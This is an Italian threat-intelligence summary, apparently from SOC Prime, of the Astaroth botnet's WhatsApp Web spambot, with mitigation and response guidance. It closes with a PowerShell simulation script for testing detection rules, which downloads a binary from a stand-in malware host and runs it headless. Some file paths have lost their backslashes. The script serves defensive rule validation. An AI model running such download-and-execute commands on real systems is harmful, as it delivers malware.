SOC Prime Bias: Alto

30 Jul 2026 15:38 UTC

Astaroth Aggiunge un Nuovo Componente Spambot per Campagne Email

Author Photo
SOC Prime Team linkedin icon Segui
Astaroth Aggiunge un Nuovo Componente Spambot per Campagne Email
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sintesi

Gli operatori della botnet Astaroth hanno aggiunto un nuovo componente spambot di WhatsApp Web per ampliare la loro portata nell’ecosistema eCrime dell’America Latina. Il modulo utilizza l’automazione del browser senza testa per trasformare le vittime compromesse in nodi di distribuzione inviando messaggi dannosi ai loro contatti WhatsApp. Questo sviluppo segna un passaggio dallo spam tradizionale tramite email verso le piattaforme di messaggistica sociale.

Investigazione

L’indagine ha incluso un’analisi tecnica dettagliata dello spambot Astaroth, rivelando la crittografia AES-CTS, un complesso processo di offuscamento delle stringhe in sei fasi e strutture di configurazione personalizzate. I ricercatori hanno identificato notevoli somiglianze nel codice tra gli spambots Astaroth e Vareg, suggerendo sviluppatori condivisi o accordi di scambio di codice. L’analisi ha anche confermato l’uso improprio di framework di automazione del browser legittimi, inclusi WebDriver e WPPConnect/WA-JS, per eseguire campagne spam nascoste.

Mitigazione

Le organizzazioni dovrebbero educare gli utenti riguardo l’ingegneria sociale basata su WhatsApp e scoraggiare l’apertura o l’esecuzione di file ricevuti da contatti sconosciuti. Le protezioni di download del browser devono essere abilitate, mentre i download e le esecuzioni non autorizzati del WebDriver devono essere strettamente monitorati. I team di sicurezza dovrebbero anche prestare attenzione alla creazione di directory sospette all’interno della cartella Temp di Windows e considerare il blocco di WPPConnect/WA-JS quando non è richiesto per l’uso legittimo aziendale.

Risposta

Se viene rilevata l’attività di Astaroth, gli endpoint interessati devono essere isolati immediatamente per interrompere ulteriori propagazioni di spam e consegna di malware. Gli investigatori dovrebbero cercare processi di browser senza testa e directory ChromeAuto_ insolite all’interno C:UsersPublicTemp. I processi WebDriver identificati dovrebbero essere sottoposti ad analisi forense e l’attività di rete deve essere esaminata per connessioni non autorizzate all’infrastruttura C2 nota di Astaroth.

Flusso di Attacco

Esecuzione della simulazione

Prerequisito: Il controllo pre-volo di Telemetria e Baseline deve essere passato.

Razionale: Questa sezione detaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa dell’attacco e comandi: L’avversario intende distribuire un modulo automatizzato di spamming su WhatsApp. Per farlo, utilizza innanzitutto una tecnica living-off-the-land, utilizzando PowerShell per scaricare un WebDriver binario in una directory locale. Una volta presente lo strumento, l’avversario esegue il binario utilizzando i flag --headless and --disable-infobars . Questo permette all’automazione di funzionare in background, invisibile per l’utente, facilitando la campagna di spam e riducendo al minimo l’impatto sull’host.

  • Script di test di regressione:

    # Script di simulazione Astaroth Spambot
    # Questo script simula la sequenza di download ed esecuzione definita nella regola di rilevamento.
    
    $workDir = "$env:TEMPWebDriverSimulation"
    if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory }
    Set-Location $workDir
    
    # 1. Simula Download (Attiva selection_webdriver_download)
    Write-Host "[+] Simulazione del download di WebDriver tramite PowerShell..."
    $dummyWebDriver = "WebDriver.exe"
    New-Item -Path $dummyWebDriver -ItemType File
    # Imitando la linea di comando che la regola cerca
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'"
    
    # 2. Simula Esecuzione (Attiva selection_webdriver_execution e selection_session_creation)
    Write-Host "[+] Simulazione dell'esecuzione di WebDriver con flag senza testa..."
    # Usiamo Start-Process per assicurarci che la linea di comando venga catturata come evento di creazione processo
    Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow
  • Comandi di pulizia:

    # Pulizia degli artefatti di simulazione
    Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force
    Write-Host "[+] Pulizia completata."